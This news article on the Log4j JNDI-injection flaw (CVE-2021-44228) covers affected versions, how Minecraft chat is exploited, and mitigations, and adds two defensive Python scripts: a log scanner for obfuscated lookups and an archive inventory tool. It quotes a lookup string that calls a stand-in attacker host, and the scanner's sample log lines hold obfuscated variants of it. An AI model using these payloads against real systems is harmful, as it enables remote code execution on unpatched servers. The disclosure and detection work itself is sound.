A new zero-day vulnerability has been disclosed in Log4j, the widely used Java logging library. It potentially affects Minecraft, iCloud, Steam and any other Java-based software that writes attacker-controlled input to its logs.
The flaw is not a firewall bypass but an injection bug in Log4j's message-lookup feature. When Log4j formats a log message that contains a string such as ${jndi:ldap://attacker.example/x}, it performs a JNDI lookup against the server named in that string and can load and run the Java class the server returns. Any user-controlled value that ends up in a log line (a username, a User-Agent header, a chat message) therefore becomes a remote code execution vector. The bug, now tracked as CVE-2021-44228, was reported to Apache by Chen Zhaojun of the Alibaba Cloud Security Team.
This type of bug is particularly serious because it allows arbitrary code execution and requires little specialist knowledge to exploit: a single crafted string in any field that gets logged is enough. Since Log4j is used throughout the Java ecosystem, software maintainers must act quickly and roll out updates before attackers reach them.
A similar vulnerability, remote code execution in Apache Struts, was exploited in the Equifax data breach in 2017, in which the personal information of nearly 150 million people was exposed.
However, because Log4j is deployed far more widely across the Java ecosystem than Struts ever was, this new flaw could prove even more dangerous.
The exploit became public when a proof of concept (PoC) was published in a GitHub repository, according to a new blog post by Sonatype.
The weakness lies in the log4j-core library and affects versions 2.0-beta9 through 2.14.1. Running on a recent Java runtime does not by itself make an application safe: newer JDKs refuse to load remote classes over LDAP by default, but the lookup can still return a serialized object that triggers a deserialization gadget already present on the application's classpath. Apache has released a fixed version, 2.15.0, but it only protects end users once developers rebuild and ship their applications with it.
Any program that uses Log4j for logging is exposed. That includes popular games like Minecraft, where Sonatype has already seen evidence of exploitation through the built-in chat function: a player types the lookup string into chat, the server logs the message, and the lookup fires on the server. There has been much speculation as to how widely the vulnerability has already been exploited.
As with earlier remote code execution bugs, there is significant evidence that attackers have started scanning the Internet for unpatched applications. Companies that rely on Log4j should update to version 2.15.0, available from Maven Central, or to whatever is the newest 2.x release, since Apache shipped further fixes after 2.15.0. Where an immediate upgrade is impossible, Apache's advisory recommends removing the JndiLookup class from the jar (zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class); the log4j2.formatMsgNoLookups=true setting only applies to 2.10 and later and was later shown to be an incomplete mitigation.
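The chat-message path above is the same pattern defenders see in web server logs: a lookup string arrives in any logged field, often obfuscated with nested lookups (${lower:j}, ${::-j}, ${env:X:-j}) to slip past naive string matching. The following is an added example, not code from the article or from Sonatype, that normalises those nested lookups and flags lines carrying a JNDI lookup. The log lines are constructed for the example (203.0.113.0/24 is a documentation address range), and the normaliser deliberately handles only the lower, upper and default-value lookup forms; Log4j has more lookups, and this is a triage aid, not a complete parser.

```python
import re

# Constructed sample log lines (not captured traffic). 203.0.113.0/24 is a documentation range.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.77:1389/a}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.77/a}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.77/a}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:dns://203.0.113.77/a}"',
    '203.0.113.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.5 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.79"',
]

# An innermost lookup: ${...} whose body contains no further ${ or }.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A fully de-obfuscated JNDI lookup: ${jndi:<scheme>:<target>}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*):([^}]*)\}", re.IGNORECASE)


def _resolve_one(body):
    """Evaluate one innermost lookup the way Log4j's obfuscation tricks rely on.

    Handles ${lower:X}, ${upper:X} and the default-value form ${key:-default}
    (which covers ${::-j} and ${env:UNSET:-j}). Anything else is left untouched."""
    prefix, _, rest = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "jndi":
        return "${" + body + "}"      # keep the thing we are looking for
    if prefix == "lower":
        return rest.lower()
    if prefix == "upper":
        return rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]  # unknown key, so the default value wins
    return "${" + body + "}"


def normalize(text, max_rounds=10):
    """Collapse nested lookups innermost-first until nothing changes."""
    for _ in range(max_rounds):
        new = INNERMOST.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def scan(lines):
    """Return (line_number, scheme, target) for every JNDI lookup found."""
    hits = []
    for number, line in enumerate(lines, 1):
        for m in JNDI.finditer(normalize(line)):
            hits.append((number, m.group(1).lower(), m.group(2)))
    return hits


def callback_hosts(hits):
    """Distinct hosts the lookups would contact: candidates for blocking and hunting."""
    hosts = set()
    for _, _, target in hits:
        m = re.match(r"//([^/:]+)", target)
        if m:
            hosts.add(m.group(1))
    return sorted(hosts)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG_LINES)
    for number, scheme, target in found:
        print(f"line {number}: jndi scheme={scheme} target={target}")
    print("callback hosts:", callback_hosts(found))
```

Lines 1 to 4 are reported with their scheme (ldap, ldap, rmi, dns) and a single callback host, while the harmless ${date:yyyy} on line 6 is not flagged. Run the scanner over access logs, chat logs and any other place user input is logged, and treat the extracted hosts as indicators to block at the egress firewall and to search for in outbound connection logs.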
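Knowing which copies of log4j-core are actually deployed is the first step, and the library is frequently buried inside WARs, fat jars and vendor bundles rather than sitting in a visible lib directory. The following is an added example, not code from the article, Sonatype or Apache, that inventories archives for log4j-core, reads the version from the bundled Maven pom.properties, checks whether JndiLookup.class is still present, and recurses into nested archives. It treats 2.15.0 as the fix level named in the article (adjust FIXED_VERSION to the newest release when you use it), and the sample WAR and jars are constructed in memory for the example; they are placeholders with a pom.properties and a dummy class entry, not Apache's real artifacts. Shaded copies without pom.properties are reported as unknown-version so they are not silently skipped, and Log4j 1.x, which has a different package layout, is out of scope.

```python
import io
import os
import re
import zipfile

# Paths inside log4j-core-*.jar that the check relies on.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 15, 0)          # fix level named in the article; raise as newer releases ship
NESTED_EXTENSIONS = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def classify(version, has_jndi_lookup):
    """Status of one log4j-core copy from its version and JndiLookup presence."""
    parsed = parse_version(version)
    if parsed is None:
        # Shaded or relocated copies often lack pom.properties; flag them for manual review.
        return "unknown-version" if has_jndi_lookup else "unknown"
    if parsed >= FIXED_VERSION:
        return "fixed"
    if not has_jndi_lookup:
        return "jndi-lookup-removed"   # the class-deletion mitigation has been applied
    return "vulnerable"


def inspect_archive(data, path="<archive>"):
    """Return [(path, version, status)] for every log4j-core found in an archive,
    descending into nested archives such as WEB-INF/lib/*.jar."""
    results = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        name_set = set(names)
        has_jndi = JNDI_LOOKUP_CLASS in name_set
        version = None
        if POM_PROPS in name_set:
            for line in z.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        if version is not None or has_jndi:
            results.append((path, version, classify(version, has_jndi)))
        for name in names:
            if name.lower().endswith(NESTED_EXTENSIONS):
                try:
                    results.extend(inspect_archive(z.read(name), f"{path}!/{name}"))
                except zipfile.BadZipFile:
                    results.append((f"{path}!/{name}", None, "unreadable"))
    return results


def scan_directory(root):
    """Walk a filesystem tree and inspect every archive found under it."""
    results = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(NESTED_EXTENSIONS):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    try:
                        results.extend(inspect_archive(fh.read(), full))
                    except zipfile.BadZipFile:
                        results.append((full, None, "unreadable"))
    return results


# Constructed test data: minimal stand-ins for real jars, not Apache's artifacts.
def make_log4j_core_jar(version, include_jndi_lookup=True):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                              f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi_lookup:
            z.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    return buf.getvalue()


def make_war(libs):
    """Bundle {filename: jar_bytes} under WEB-INF/lib like a deployed web application."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in libs.items():
            z.writestr(f"WEB-INF/lib/{name}", data)
    return buf.getvalue()


SAMPLE_WAR = make_war({
    "log4j-core-2.14.1.jar": make_log4j_core_jar("2.14.1"),
    "log4j-core-2.15.0.jar": make_log4j_core_jar("2.15.0"),
    "log4j-core-2.13.3-patched.jar": make_log4j_core_jar("2.13.3", include_jndi_lookup=False),
    "log4j-core-2.0-beta9.jar": make_log4j_core_jar("2.0-beta9"),
})

if __name__ == "__main__":
    for path, version, status in inspect_archive(SAMPLE_WAR, "app.war"):
        print(f"{status:20} {version or '?':10} {path}")
```

Against the sample WAR the 2.14.1 and 2.0-beta9 copies come back as vulnerable, 2.15.0 as fixed, and the copy with JndiLookup.class deleted as jndi-lookup-removed. Point scan_directory at application and container directories, and remember that an inventory based on file names alone misses renamed and shaded copies; that is why the check reads pom.properties and the class list rather than trusting the jar name.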
Brian Fox, CTO of Sonatype, spoke on JavaOne about the Log4j bug and its global impact. He said:
“This new Log4j vulnerability is likely to be another flashbulb memory event on the major vulnerability timeline. It is the most widely used logging framework in the Java ecosystem. The scope of the applications affected is comparable to the Commons Collections vulnerability from 2015 (CVE-2015-7501), since attackers can safely assume that targets probably have them in the classpath. The impact is similar to previous Struts vulnerabilities, such as the one affecting Equifax, in that the attacks can be carried out remotely, anonymously, without credentials, and result in a remote exploit. The combination of scope and potential impact here is different from any previous component vulnerability that I can easily remember.”